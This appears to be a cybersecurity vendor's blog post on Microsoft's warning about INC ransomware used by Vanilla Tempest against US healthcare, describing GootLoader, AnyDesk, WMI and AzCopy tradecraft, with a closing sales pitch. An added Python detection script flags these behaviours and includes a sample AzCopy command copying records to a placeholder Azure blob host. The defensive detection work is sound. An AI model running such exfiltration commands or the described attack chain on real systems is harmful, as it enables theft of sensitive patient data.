Microsoft has issued a warning regarding a new ransomware strain named INC, which is being used by a financially motivated threat actor to target the U.S. healthcare sector. This alarming development highlights the ongoing risks faced by healthcare organizations in the digital landscape.
Key Takeaways
New Ransomware Strain: The INC ransomware is being deployed for the first time against healthcare entities.
Threat Actor: The activity is tracked under the name Vanilla Tempest, previously known as DEV-0832.
Attack Methodology: Attackers utilize tools like Supper backdoor and AnyDesk for lateral movement before deploying ransomware.
Historical Context: Vanilla Tempest has been active since July 2022, targeting various sectors including education and manufacturing.
Overview of the Threat
Microsoft's threat intelligence team has identified a new player in the ransomware landscape, known as Vanilla Tempest. This group has been linked to a series of attacks that have increasingly targeted the healthcare sector, which is particularly vulnerable due to the sensitive nature of the data it handles.
The INC ransomware is notable for its sophisticated deployment methods, which involve a multi-step process that begins with GootLoader infections. Once the initial foothold is established, attackers leverage tools such as the Supper backdoor and AnyDesk to navigate through the network.
Attack Methodology
The attack process can be broken down into several key steps:
Initial Infection: The threat actor uses GootLoader to gain access to the network.
Lateral Movement: Utilizing Remote Desktop Protocol (RDP), attackers move laterally within the network.
Payload Deployment: The final step involves deploying the INC ransomware payload using Windows Management Instrumentation (WMI) Provider Host.
This methodical approach allows attackers to maximize their chances of success while minimizing the risk of detection.
Historical Context and Previous Targets
Vanilla Tempest has been active since at least July 2022, with a history of targeting various sectors, including:
Healthcare
Education
IT
Manufacturing
In previous attacks, the group has utilized various ransomware families, such as BlackCat, Quantum Locker, Zeppelin, and Rhysida. This adaptability in using different ransomware strains demonstrates the group's capability and intent to exploit vulnerabilities across multiple industries.
Evolving Tactics in Ransomware Attacks
The rise of ransomware groups like BianLian and Rhysida has introduced new tactics for data exfiltration. Recent observations indicate that these groups are increasingly using tools like Azure Storage Explorer and AzCopy to transfer sensitive data to cloud storage, thereby evading traditional detection methods.
Britton Manahan, a modePUSH researcher, noted that these tools, originally designed for managing Azure storage, are being repurposed by threat actors for large-scale data transfers. This shift in tactics underscores the need for organizations to remain vigilant and adapt their cybersecurity measures accordingly.
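As an added illustration, not code from the article, Microsoft, or modePUSH, the following Python triage rules run over constructed process-creation events and flag the three behaviours described above: AnyDesk execution, WMI Provider Host launching an unexpected child, and AzCopy or Storage Explorer copying to an Azure blob endpoint. The event field names, the WmiPrvSE child allowlist and every sample event are assumptions for the example.

```python
# Added example (not from the article or Microsoft's report): process-creation
# triage rules for the tradecraft the article describes. Event shapes and the
# sample events below are constructed; field names mirror Sysmon Event ID 1.
import re
from typing import Iterable

# Tools the article names: AnyDesk for remote access, AzCopy and Azure Storage
# Explorer for bulk transfer to Azure blob storage, WMI Provider Host as the
# parent that launched the ransomware payload.
REMOTE_ACCESS_TOOLS = {"anydesk.exe"}
CLOUD_COPY_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
WMI_HOST = "wmiprvse.exe"
# Children WmiPrvSE.exe commonly spawns (assumption; tune per estate).
# Anything outside this set gets flagged.
WMI_EXPECTED_CHILDREN = {"conhost.exe", "werfault.exe"}
BLOB_ENDPOINT = re.compile(r"https://[\w.-]+\.blob\.core\.windows\.net", re.I)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(events: Iterable[dict]) -> list[tuple[str, str]]:
    """Return (rule_name, image_basename) for each event matching a rule."""
    hits = []
    for ev in events:
        image = _basename(ev["Image"])
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if image in REMOTE_ACCESS_TOOLS:
            hits.append(("remote_access_tool", image))
        if image in CLOUD_COPY_TOOLS and BLOB_ENDPOINT.search(cmd):
            hits.append(("bulk_copy_to_azure_blob", image))
        if parent == WMI_HOST and image not in WMI_EXPECTED_CHILDREN:
            hits.append(("wmi_provider_host_spawned_process", image))
    return hits

# Constructed sample events (not real telemetry); payload.exe is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "AnyDesk.exe --install"},
    {"Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "WmiPrvSE.exe"},
    {"Image": r"C:\PerfLogs\payload.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "CommandLine": "payload.exe"},
    {"Image": r"C:\Tools\azcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'azcopy.exe copy "D:\Records" "https://example123.blob.core.windows.net/c" --recursive'},
    {"Image": r"C:\Tools\azcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'azcopy.exe copy "D:\backup" "\\fileserver\share" --recursive'},
]

if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

The last sample event, an AzCopy run to an internal share, is deliberately not flagged; the blob-endpoint check is what separates routine backup jobs from transfers to attacker-controlled Azure storage.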
The emergence of the INC ransomware strain and the activities of the Vanilla Tempest group serve as a stark reminder of the evolving threat landscape facing the U.S. healthcare sector. As cybercriminals continue to refine their methods, it is crucial for organizations to bolster their defenses and remain proactive in their cybersecurity strategies to protect sensitive data from falling into the wrong hands.
Staying ahead of cyber threats requires constant vigilance and cutting-edge solutions. BetterWorld Technology provides comprehensive cybersecurity services that protect your business from data breaches, ransomware, and other cyberattacks. Our team offers proactive monitoring, threat detection, and rapid incident response to ensure your systems remain secure and your data is safe. Book a consultation with us now and let BetterWorld Technology strengthen your cybersecurity posture and defend your business from the ever-evolving threat landscape.
Sources
Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector, The Hacker News.